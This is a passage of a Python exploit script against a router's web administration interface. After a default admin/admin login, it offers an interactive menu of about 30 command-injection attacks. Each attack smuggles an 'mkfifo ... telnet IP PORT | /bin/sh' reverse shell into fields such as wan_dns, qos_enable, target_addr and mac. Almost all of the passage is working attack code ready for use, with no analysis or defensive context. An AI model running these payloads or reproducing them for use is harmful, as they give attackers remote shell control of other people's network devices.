        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_guide_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_guide_settings"
    payload = {
        "proto":"dhcp", 

        "wan_dns": "\""+"||"+f"ash -c \"mkfifo /tmp/13&&telnet {ip} {port} 0</tmp/13|/bin/sh>/tmp/13",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_qos_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_qos"
    payload = {
       "qqos_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/14 && telnet {ip} {port} 0</tmp/14|/bin/sh > /tmp/14",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_portfw_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_portfw"
    payload = {
        "lanport":"1",
        "wanport":"1",
        "protocol":"1",
        "modmun":"1",
       "ipaddr": "1\" "+"||"+f" ash -c \"mkfifo /tmp/15 && telnet {ip} {port} 0</tmp/15|/bin/sh > /tmp/15",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_dmz_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_dmz"
    payload = {
       "dmz_enable": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/16 && telnet {ip} {port} 0</tmp/16|/bin/sh > /tmp/16",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_upnp_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_upnp"
    payload = {
       "upnp_enable": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/17 && telnet {ip} {port} 0</tmp/17|/bin/sh > /tmp/17",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_nat_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_nat"
    payload = {
       "nat_enable": "1\" "+"||"+f" ash -c \"mkfifo /tmp/18 && telnet {ip} {port} 0</tmp/18|/bin/sh > /tmp/18",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_filtering_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_filtering"
    payload = {
        "sel_mode":"1",
        "modmun":"1",
        "ipaddr":"1",
       "proto": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/19 && telnet {ip} {port} 0</tmp/19|/bin/sh > /tmp/19",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_prohibiting_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_prohibiting"
    payload = {
        "macaddr":"1",
       "ipaddr": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/20 && telnet {ip} {port} 0</tmp/20|/bin/sh > /tmp/20",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_ipv6_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ipv6"
    payload = {
        "router_advertisement":"2", #Trigger
        "dhcpv6_service":"3",
        "ndp_proxy":"0",
       "dhcpv6_mode": "1\" "+"&&"+f" ash -c \"mkfifo /tmp/21 && telnet {ip} {port} 0</tmp/21|/bin/sh > /tmp/21",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response
#
def send_set_ntp_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_ntp"
    payload = {
        "ntp_zone_name":"2", #Trigger
        "ntp_client":"3",
       "ntp_zone_val": "1\" "+"||"+f" ash -c \"mkfifo /tmp/22 && telnet {ip} {port} 0</tmp/22|/bin/sh > /tmp/22",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response
 
def send_set_wan_settings_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_wan_settings"
    payload = {
        "proto":"dhcp", 
        "wan_dns": "\""+"||"+f"ash -c \"mkfifo /tmp/27&&telnet {ip} {port} 0</tmp/27|/bin/sh>/tmp/27",
        "token": auth_token

    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_diag_ping_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_ping"
    payload = {

       "target_addr": f"|| ash -c \"mkfifo /tmp/23 && telnet {ip} {port} 0</tmp/23|/bin/sh > /tmp/23 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_diag_traceroute_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_traceroute"
    payload = {

       "target_addr": f"|| ash -c \"mkfifo /tmp/24 && telnet {ip} {port} 0</tmp/24|/bin/sh > /tmp/24 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_diag_nslookup_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/diag_nslookup"
    payload = {
       "target_addr": f"|| ash -c \"mkfifo /tmp/25 && telnet {ip} {port} 0</tmp/25|/bin/sh > /tmp/25 \" ||",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_delete_prohibiting_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/delete_prohibiting"
    payload = {
       "delvalue": f"||mkfifo /tmp/0&&telnet {ip} {port} 0</tmp/0|/bin/sh>/tmp/0\"#",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_mode_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_mode"
    payload = {
        "modeSelection": "1",
        "lan_gateway": f"\";mkfifo /tmp/28 ; telnet {ip} {port} 0</tmp/28|/bin/sh > /tmp/28 ;#",
        "lan_netmask":  "1",
        "lan_ipaddr": "1",
        "port": "1\" "+"||"+f" ash -c \"mkfifo /tmp/28 && telnet {ip} {port} 0</tmp/28|/bin/sh > /tmp/28",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_set_device_name_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/set_device_name"
    payload = {
        "device_alias": "1",
        "mac": f" ';mkfifo /tmp/29 ; telnet {ip} {port} 0</tmp/29|/bin/sh > /tmp/29 ;'",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def send_delete_offline_device_request(host_ip, session_id, auth_token, ip, port):
    url = f"http://{host_ip}/goform/delete_offline_device"
    payload = {
        "delvalue": f" ';mkfifo /tmp/30 ; telnet {ip} {port} 0</tmp/30|/bin/sh > /tmp/30 ;'",
        "token": auth_token
    }
    response = requests.post(url, data=payload, cookies={'sessionid': session_id, 'token': auth_token})
    return response

def main():
    host_ip = input("Enter host IP: ")#"192.168.1.1:81"#
    username = "admin"  # input("Enter username: ")
    password = "admin"  # input("Enter password: ")

    ip = input("Enter target IP (e.g., 192.168.1.2): ")
    port = input("Enter target port (e.g., 6666): ")

    log.info(f'Author: {__author__}, email: {__email__}')
    log.info(f'Host IP: {host_ip}')

    # Fetch login page
    session_id, auth_token = fetch_login_page(host_ip)
    if session_id and auth_token:   
        log.info(f"Successfully fetched login page. sessionid={session_id}, token={auth_token}")

        # Encrypt the password
        hashed_password = encrypt_password(password, auth_token)

        # Submit login request
        response = submit_login(host_ip, username, hashed_password, session_id, auth_token)
        if response.status_code == 200:
            log.info("Login request submitted successfully.")
            log.debug(f"Response: {response.text}")

            # Extract updated session_id and auth_token from login response
            session_id, auth_token = extract_cookies(response)

            # Start a loop to continuously perform actions
            while True:
                # Menu for actions
                print("\nChoose an action to perform:")
                print("1: set_wifidog")
                print("2: set_ac_server")
                print("3: set_lan_settings")
                print("4: set_ddns")
                print("5: set_static_route_table")
                print("6: set_static_leases")
                print("7: set_server_settings")
                print("8: set_switch_settings")
                print("9: set_language")
                print("10: set_ac_status")
                print("11: set_system_reboot")
                print("12: set_wifi_blacklists")
                print("13: set_guide_settings")                
                print("14: set_qos")
                print("15: set_portfw")
                print("16: set_dmz")
                print("17: set_upnp")
                print("18: set_nat")
                print("19: set_filtering")
                print("20: set_prohibiting")
                print("21: set_ipv6")
                print("22: set_ntp")
                print("23: diag_ping")
                print("24: diag_traceroute")
                print("25: diag_nslookup")
                print("26: delete_prohibiting")
                print("27: set_wan_settings")
                print("28: set_mode")
                print("29: set_device_name")
                print("30: delete_offline_device")
                print("31: Exit")

                action = input("Enter your choice: ")

                match action:
                    case "1":
                        # Configure Wifidog settings
                        response = send_set_wifidog_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_wifidog_settings_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to configure Wifidog settings.")
                    case "2":
                        # Configure AC server settings
                        response = send_set_ac_server_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ac_server_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to configure AC server settings.")
                    case "3":
                        # Configure lan_settings
                        response = send_set_lan_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ac_server_dhcp_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to configure AC server DHCP settings.")
                    case "4":
                        # Configure set_ddns
                        response = send_set_ddns_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ddns_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_ddns_request.")
                    case "5":
                        # Configure static_route_table
                        response = send_set_static_route_table_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_static_route_table_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_static_route_table_request.")   
                    case "6":
                        # Configure send_set_static_leases_request
                        response = send_set_static_leases_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_static_leases_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_static_leases_request.")                        
                    #set_static_route_table
                    case "7":
                        # Configure set_server_settings
                        response = send_set_server_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("set_server_settings successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to set_server_settings.")   
                    case "8":
                        # Configure set_switch_settings
                        response = send_set_switch_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("set_switch_settings successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to set_switch_settings.")       
                    case "9":
                        # Configure set_language
                        response = send_set_language_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("set_language successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to set_language.")  
                    case "10":
                        # Configure send_set_ac_status_request
                        response = send_set_ac_status_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ac_status_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_ac_status_request.")  
                    case "11":
                        # Configure set_system_reboot
                        response = send_set_system_reboot_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("set_system_reboot successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to set_system_reboot.")  
                    case "12":
                        # Configure set_wifi_blacklists
                        response = send_set_wifi_blacklists_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("set_wifi_blacklists successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to set_wifi_blacklists.")   
                    case "13":
                        # Configure send_set_guide_settings_request
                        response = send_set_guide_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_guide_settings_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_guide_settings_request.")                                                                 
                    case "14":
                        # Configure send_set_qos_request
                        response = send_set_qos_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_qos_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_qos_request.")     
                    case "15":
                        # Configure send_set_portfw_request
                        response = send_set_portfw_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_portfw_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_portfw_request.")                               
                    case "16":
                        # Configure send_set_dmz_request
                        response = send_set_dmz_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_dmz_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_dmz_request.")       
                    case "17":
                        # Configure send_set_upnp_request
                        response = send_set_upnp_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_upnp_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_upnp_request.")                               
                    case "18":
                        # Configure send_set_nat_request
                        response = send_set_nat_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_nat_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_nat_request.")   
                    case "19":
                        # Configure send_set_filtering_request
                        response = send_set_filtering_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_filtering_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_filtering_request.")                             
                    case "20":
                        # Configure send_set_prohibiting_request
                        response = send_set_prohibiting_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_prohibiting_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_prohibiting_request.")
                    case "21":
                        # Configure send_set_ipv6_request
                        response = send_set_ipv6_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ipv6_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_ipv6_request.")       
                    case "22":
                        # Configure send_set_ntp_request
                        response = send_set_ntp_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_ntp_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_ntp_request.")       
                    case "23":
                        # Configure send_diag_ping_request
                        response = send_diag_ping_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_diag_ping_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_diag_ping_request.")       
                    case "24":
                        # Configure send_diag_traceroute_request
                        response = send_diag_traceroute_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_diag_traceroute_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_diag_traceroute_request.") 
                    case "25":
                        # Configure send_diag_nslookup_request
                        response = send_diag_nslookup_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_diag_nslookup_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_diag_nslookup_request.")       
                    case "26":
                        # Configure send_diag_nslookup_request
                        response = send_delete_prohibiting_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_delete_prohibiting_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_delete_prohibiting_request.")       
                    case "27":
                        # Configure send_set_wan_settings_request
                        response = send_set_wan_settings_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_wan_settings_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_wan_settings_request.")    
                    case "28":
                        # Configure send_diag_nslookup_request
                        response = send_set_mode_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_mode_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_mode_request.")        
                    case "29":
                        # Configure send_set_device_name_request
                        response = send_set_device_name_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_set_device_name_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_set_device_name_request.")  
                    case "30":
                        # Configure send_delete_offline_device_request
                        response = send_delete_offline_device_request(host_ip, session_id, auth_token, ip, port)
                        if response.status_code == 200:
                            log.info("send_delete_offline_device_request successfully.")
                            log.debug(f"Response: {response.text}")
                        else:
                            log.error("Failed to send_delete_offline_device_request.")                                                                                                                                                                                                                                                                                                                                                                      
                    # case "33":
                    #     # Configure send_reset_settings_request
                    #     response = send_reset_settings_request(host_ip, session_id, auth_token, ip, port)
                    #     if response.status_code == 200:
                    #         log.info("send_reset_settings_request successfully.")
                    #         log.debug(f"Response: {response.text}")
                    #     else:
                    #         log.error("Failed to send_reset_settings_request.")                    
                    case "31":
                        exit(-1)
                    case _:
                        log.error("Invalid action selected.")
        else:
            log.error("Failed to submit login request.")
    else:
        log.error("Failed to retrieve session ID and token from login page.")

if __name__ == "__main__":
    main()
No results found